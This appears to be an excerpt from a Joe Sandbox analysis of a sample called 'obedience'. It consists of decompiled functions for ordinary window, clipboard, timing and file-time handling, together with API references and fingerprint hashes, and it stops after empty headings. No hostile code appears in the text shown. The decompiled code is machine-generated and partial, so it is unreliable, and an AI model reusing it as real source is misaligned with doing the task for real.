      0x00464050
      0x00464051
      0x00464051
      0x0046403f
      0x0046406d
      0x00464076
      0x00464078
      0x0046407a
      0x0046407a
      0x00464080
      0x00464089
      0x0046408b
      0x0046408d
      0x0046408d
      0x00464097
      0x0046409c
      0x004640a1
      0x004640b4
      0x004640bc
      0x004640bc
      0x004640c3
      0x004640c8
      0x004640cd
      0x004640cd
      0x004640d2
      0x004640dc
      0x004640dc
      0x004640e9
      0x00000000
      0x004640f3
      0x004640e9
      0x004640fb

      APIs
      • IsIconic.USER32 ref: 00464004
      • SetActiveWindow.USER32(?,?,?,?,00463A29,00000000,00463EE7), ref: 00464015
      • IsWindowEnabled.USER32(00000000), ref: 00464038
      • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00463A29,00000000,00463EE7), ref: 00464051
      • SetWindowPos.USER32(?,00000000,00000000,?,?,00463A29,00000000,00463EE7), ref: 00464097
      • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00463A29,00000000,00463EE7), ref: 004640DC
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
      • String ID:
      • API String ID: 3996302123-0
      • Opcode ID: 464bc6d1d06e961608d28c771647fdcae81ea12c68045d2a4d84896d5cded9f2
      • Instruction ID: 5e9e04771ccc4d2063fef2887d9cf379e5564c0b831c913b56619a8eb5323e83
      • Opcode Fuzzy Hash: 464bc6d1d06e961608d28c771647fdcae81ea12c68045d2a4d84896d5cded9f2
      • Instruction Fuzzy Hash: A0312F71B04250ABEF24AE69CD85B5A3798AB45704F08047AFF00EF2D7E67DEC44871A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043D32C Relevance: 9.1, APIs: 6, Instructions: 82clipboardmemoryCOMMON
      Download Yara Rule
      C-Code - Quality: 46%
      			E0043D32C(void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _t28;
				void* _t34;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t51;
				intOrPtr _t53;
				void* _t57;
				void* _t58;
				intOrPtr _t59;

				_t57 = _t58;
				_t59 = _t58 + 0xfffffff4;
				_v8 = __edx;
				E00404EF0(_v8);
				_push(_t57);
				_push(0x43d45c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t59;
				if(OpenClipboard(0) == 0) {
					_t43 =  *0x48f5ac; // 0x423d10
					E0040CCA8(_t43, 1);
					E004043D0();
					_pop(_t51);
					 *[fs:eax] = _t51;
					_push(0x43d463);
					return E00404A40( &_v8);
				} else {
					_push(_t57);
					_push(0x43d428);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_v12 = GlobalAlloc(0x2002, E00404D00(_v8) + 1);
					_push(_t57);
					_push(0x43d3fd);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_t28 = _v12;
					GlobalFix(_t28);
					_v16 = _t28;
					_push(_t57);
					_push(0x43d3ec);
					_push( *[fs:eax]);
					 *[fs:eax] = _t59;
					_push(E00404D00(_v8) + 1);
					_t34 = E00404F00(_v8);
					_pop(_t46);
					E00402CEC(_t34, _t46, _v16);
					EmptyClipboard();
					SetClipboardData(1, _v12);
					_pop(_t53);
					 *[fs:eax] = _t53;
					_push(0x43d3f3);
					return GlobalUnWire(_v12);
				}
			}















      0x0043d32d
      0x0043d32f
      0x0043d335
      0x0043d33b
      0x0043d342
      0x0043d343
      0x0043d348
      0x0043d34b
      0x0043d357
      0x0043d42f
      0x0043d43c
      0x0043d441
      0x0043d448
      0x0043d44b
      0x0043d44e
      0x0043d45b
      0x0043d35d
      0x0043d35f
      0x0043d360
      0x0043d365
      0x0043d368
      0x0043d37f
      0x0043d384
      0x0043d385
      0x0043d38a
      0x0043d38d
      0x0043d390
      0x0043d394
      0x0043d399
      0x0043d39e
      0x0043d39f
      0x0043d3a4
      0x0043d3a7
      0x0043d3b3
      0x0043d3b7
      0x0043d3bf
      0x0043d3c0
      0x0043d3c5
      0x0043d3d0
      0x0043d3d7
      0x0043d3da
      0x0043d3dd
      0x0043d3eb
      0x0043d3eb

      APIs
      • OpenClipboard.USER32(00000000), ref: 0043D350
      • GlobalAlloc.KERNEL32(00002002,00000001,00000000,0043D428,?,00000000,0043D45C), ref: 0043D37A
      • GlobalFix.KERNEL32 ref: 0043D394
      • EmptyClipboard.USER32(00000000,0043D3EC,?,?,00000000,0043D3FD,?,00002002,00000001,00000000,0043D428,?,00000000,0043D45C), ref: 0043D3C5
      • SetClipboardData.USER32 ref: 0043D3D0
      • GlobalUnWire.KERNEL32(?), ref: 0043D3E6
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ClipboardGlobal$AllocDataEmptyOpenWire
      • String ID:
      • API String ID: 461592451-0
      • Opcode ID: a97772e44d22911fa3e36d06db9823f5579b9a6dbf3cc6d966f35112a804da02
      • Instruction ID: e63834b7d479ea035c040ee78233693d7f82344d75b3de6e7f2546991df4e9b1
      • Opcode Fuzzy Hash: a97772e44d22911fa3e36d06db9823f5579b9a6dbf3cc6d966f35112a804da02
      • Instruction Fuzzy Hash: 5E218370A04204BFD701EF66EC52D6EBBACEB49704F51447AF900E36D1D639AD10D969
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044AB44 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
      Download Yara Rule
      C-Code - Quality: 85%
      			E0044AB44(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
				void* _v20;
				struct _WINDOWPLACEMENT _v48;
				char _v64;
				void* _t31;
				int _t45;
				int _t51;
				void* _t52;
				int _t56;
				int _t58;

				_t56 = __ecx;
				_t58 = __edx;
				_t52 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
					L4:
					if(E0044B45C(_t52) == 0) {
						L7:
						 *(_t52 + 0x40) = _t58;
						 *(_t52 + 0x44) = _t56;
						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
						_t31 = E0044B45C(_t52);
						__eflags = _t31;
						if(_t31 != 0) {
							_v48.length = 0x2c;
							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
							E004442C8(_t52,  &_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
						}
						L9:
						E00443F7C(_t52);
						return E00403DF8(_t52, _t66);
					}
					_t45 = IsIconic( *(_t52 + 0x180));
					_t66 = _t45;
					if(_t45 != 0) {
						goto L7;
					}
					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
					goto L9;
				} else {
					_t51 = _a4;
					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
						return _t51;
					}
					goto L4;
				}
			}












      0x0044ab4d
      0x0044ab4f
      0x0044ab51
      0x0044ab56
      0x0044ab71
      0x0044ab7a
      0x0044aba8
      0x0044aba8
      0x0044abab
      0x0044abb1
      0x0044abb7
      0x0044abbc
      0x0044abc1
      0x0044abc3
      0x0044abc5
      0x0044abd7
      0x0044abe1
      0x0044abec
      0x0044abed
      0x0044abee
      0x0044abef
      0x0044abfb
      0x0044abfb
      0x0044ac00
      0x0044ac02
      0x00000000
      0x0044ac0d
      0x0044ab83
      0x0044ab88
      0x0044ab8a
      0x00000000
      0x00000000
      0x0044aba1
      0x00000000
      0x0044ab65
      0x0044ab65
      0x0044ab6b
      0x0044ac18
      0x0044ac18
      0x00000000
      0x0044ab6b

      APIs
      • IsIconic.USER32 ref: 0044AB83
      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044ABA1
      • GetWindowPlacement.USER32(?,0000002C), ref: 0044ABD7
      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0044ABFB
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Placement$Iconic
      • String ID: ,
      • API String ID: 568898626-3772416878
      • Opcode ID: e494ebc5bb2c508008432f3f3ac19aad58117c86fa7887328a91d2b2279d1e61
      • Instruction ID: 7cdf8aaac00e2129449384dfe2acbf317d57f5134c70caf019597a77b667cf10
      • Opcode Fuzzy Hash: e494ebc5bb2c508008432f3f3ac19aad58117c86fa7887328a91d2b2279d1e61
      • Instruction Fuzzy Hash: 84216271A00104ABDF54EFADC8C599A77A9EF08354F04846AFE04EF346D779ED048BA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00463F4C Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
      Download Yara Rule
      C-Code - Quality: 72%
      			E00463F4C(void* __eax) {
				struct HWND__* _t21;
				void* _t40;

				_t40 = __eax;
				_t21 = IsIconic( *(__eax + 0x30));
				if(_t21 == 0) {
					E00463638();
					SetActiveWindow( *(_t40 + 0x30));
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0044B158( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t21 = E00462F54( *(_t40 + 0x30), 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						SetWindowPos( *(_t40 + 0x30), E0044B158( *((intOrPtr*)(_t40 + 0x44))),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t21 =  *(_t40 + 0x30);
						_push(_t21);
						L00407550();
					}
					if( *((short*)(_t40 + 0x11a)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x118))();
					}
				}
				return _t21;
			}





      0x00463f4e
      0x00463f54
      0x00463f5b
      0x00463f63
      0x00463f6c
      0x00463f75
      0x00463fdc
      0x00463f98
      0x00463f9c
      0x00463fb8
      0x00463fbd
      0x00463fbf
      0x00463fc4
      0x00463fc9
      0x00463fcc
      0x00463fcd
      0x00463fcd
      0x00463fe9
      0x00000000
      0x00463ff3
      0x00463fe9
      0x00463ffb

      APIs
      • IsIconic.USER32 ref: 00463F54
      • SetActiveWindow.USER32(?,?,?,00490B7C,004646B0), ref: 00463F6C
      • IsWindowEnabled.USER32(00000000), ref: 00463F8F
      • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,00490B7C,004646B0), ref: 00463FB8
      • NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,00490B7C), ref: 00463FCD
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$ActiveEnabledIconicNtdllProc_
      • String ID:
      • API String ID: 1720852555-0
      • Opcode ID: 9580dc9ab7ea42ae1e013a5f52101e197ea619e460490188a7263d1fc1943d5f
      • Instruction ID: 2251ec4f72312f945e9ede35c8d4992597ec7f58a7929770e07453b568f242b9
      • Opcode Fuzzy Hash: 9580dc9ab7ea42ae1e013a5f52101e197ea619e460490188a7263d1fc1943d5f
      • Instruction Fuzzy Hash: CD11F171A04240ABDB58EF6DC98AB9637A8AF04305F04046ABB04DB287E679EC44875A
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D738 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E0042D738(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t22;

				_t19 = _a8;
				_t22 = _a4;
				if( *0x49092d != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t22) == 0) {
							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t22,  &_v48);
						}
						return E0042D6A8( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x490908; // 0x42d738
				 *0x490908 = E0042D52C(1, _t19, "MonitorFromWindow", _t21, _t22);
				return  *0x490908(_t22, _t19);
			}










      0x0042d740
      0x0042d743
      0x0042d74d
      0x0042d777
      0x0042d788
      0x0042d79b
      0x0042d78a
      0x0042d78f
      0x0042d78f
      0x00000000
      0x0042d7a5
      0x00000000
      0x0042d779
      0x0042d754
      0x0042d761
      0x00000000

      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressProc
      • String ID: MonitorFromWindow
      • API String ID: 190572456-2842599566
      • Opcode ID: 5715bf3131fcaa5dd9bcea958775c986e0957f7b0af7cd74459e7291f9f5f307
      • Instruction ID: d12581fe6b9e84d9641c87f21ad367f450782f1497440c250546adf2207ba739
      • Opcode Fuzzy Hash: 5715bf3131fcaa5dd9bcea958775c986e0957f7b0af7cd74459e7291f9f5f307
      • Instruction Fuzzy Hash: E701ADB6F061286E9700AB64EC819FB736CDB54354B90413BF85093242DB3CAD0187AE
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043EDE4 Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
      Download Yara Rule
      C-Code - Quality: 58%
      			E0043EDE4(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x43ee61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E0043E844(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0043E444(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E00404F00(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x43ee68);
				return E00404A40( &_v8);
			}









      0x0043ede7
      0x0043edeb
      0x0043edef
      0x0043edf0
      0x0043edf5
      0x0043edf8
      0x0043edfd
      0x0043ee07
      0x0043ee09
      0x0043ee0b
      0x0043ee17
      0x0043ee25
      0x0043ee2e
      0x0043ee37
      0x0043ee46
      0x0043ee46
      0x0043ee4d
      0x0043ee50
      0x0043ee53
      0x0043ee60

      APIs
        • Part of subcall function 0043E844: WinHelpA.USER32 ref: 0043E853
      • GetTickCount.KERNEL32 ref: 0043EE02
      • Sleep.KERNEL32(00000000,00000000,0043EE61,?,?,00000000,00000000,?,0043EDDA), ref: 0043EE0B
      • GetTickCount.KERNEL32 ref: 0043EE10
      • WinHelpA.USER32 ref: 0043EE46
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CountHelpTick$Sleep
      • String ID:
      • API String ID: 2438605093-0
      • Opcode ID: 8e33e0e4cc27ad011a781805fef770ae864b6f6a959dbf9318e14417f39d9839
      • Instruction ID: 3059649e566d64dcbcfeed69baad9d8d9e1fa4fa0e41bc41da56395f2e87d1aa
      • Opcode Fuzzy Hash: 8e33e0e4cc27ad011a781805fef770ae864b6f6a959dbf9318e14417f39d9839
      • Instruction Fuzzy Hash: 90016230B04204AFE711EB67DC53B5E72A8DB8D704F61447BF500E76D2DA786E0089AE
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00409798 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00409798(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404F00(__eax),  &_v336);
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








      0x004097b3
      0x004097bb
      0x004097f1
      0x004097f1
      0x004097bd
      0x004097be
      0x004097ca
      0x00000000
      0x004097cc
      0x004097d7
      0x004097ef
      0x00000000
      0x00000000
      0x004097ef
      0x004097ca
      0x004097ff

      APIs
      • FindFirstFileA.KERNEL32(00000000,?), ref: 004097B3
      • FindClose.KERNEL32(00000000,00000000,?), ref: 004097BE
      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004097D7
      • FileTimeToDosDateTime.KERNEL32 ref: 004097E8
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileTime$Find$CloseDateFirstLocal
      • String ID:
      • API String ID: 2659516521-0
      • Opcode ID: 869761e129e18ed7858d7ffabd136295bab75db844683330128e23767959f97d
      • Instruction ID: 811e8bcf15501fb0351e252b621e0f16fa8c16e5037b0c5b3c8ff01e1ed7727f
      • Opcode Fuzzy Hash: 869761e129e18ed7858d7ffabd136295bab75db844683330128e23767959f97d
      • Instruction Fuzzy Hash: 77F0F472D0420CA6CB11DEA58C85ACF73AC5B05324F5007B7B525F31D1EA389B445795
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00448B44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
      Download Yara Rule
      C-Code - Quality: 91%
      			E00448B44(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00445098(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00445BB4(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00448AB0(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0044B45C(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0044B158(_t50);
						_push(_t32);
						L00407550();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00445BB4(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407A88( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0044446C(_t50,  &_v28,  &_v20);
					_t21 = E00448A1C(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E0045B78C(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0044B158(__eax);
						if(_t45 == GetCapture() &&  *0x48ec98 != 0) {
							_t47 =  *0x48ec98; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x48ec98; // 0x0
								E00445AE8(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}


















      0x00448b4a
      0x00448b4c
      0x00448b4e
      0x00448b50
      0x00448b55
      0x00448b74
      0x00448b77
      0x00448c54
      0x00448c5b
      0x00448ca6
      0x00448ca6
      0x00448ca6
      0x00448c97
      0x00000000
      0x00448c9b
      0x00448b85
      0x00448c1e
      0x00448c25
      0x00000000
      0x00000000
      0x00448c2b
      0x00000000
      0x00000000
      0x00448c2f
      0x00448c36
      0x00000000
      0x00000000
      0x00448c3b
      0x00448c3f
      0x00448c42
      0x00448c45
      0x00448c4a
      0x00448c4b
      0x00000000
      0x00448c4b
      0x00000000
      0x00448b8b
      0x00448b57
      0x00448bcd
      0x00448bd6
      0x00000000
      0x00000000
      0x00448be5
      0x00448bf4
      0x00448c01
      0x00448c08
      0x00000000
      0x00000000
      0x00448c0e
      0x00000000
      0x00448c0e
      0x00448b59
      0x00448b5c
      0x00448b97
      0x00448b9b
      0x00000000
      0x00000000
      0x00448ba7
      0x00448baf
      0x00000000
      0x00000000
      0x00000000
      0x00448bb5
      0x00448b5e
      0x00448b5f
      0x00448bbe
      0x00000000
      0x00000000
      0x00448b61
      0x00448b64
      0x00448c61
      0x00448c6f
      0x00448c7a
      0x00448c82
      0x00448c8d
      0x00448c92
      0x00448c92
      0x00448c82
      0x00448c6f
      0x00448b64

      APIs
      Strings
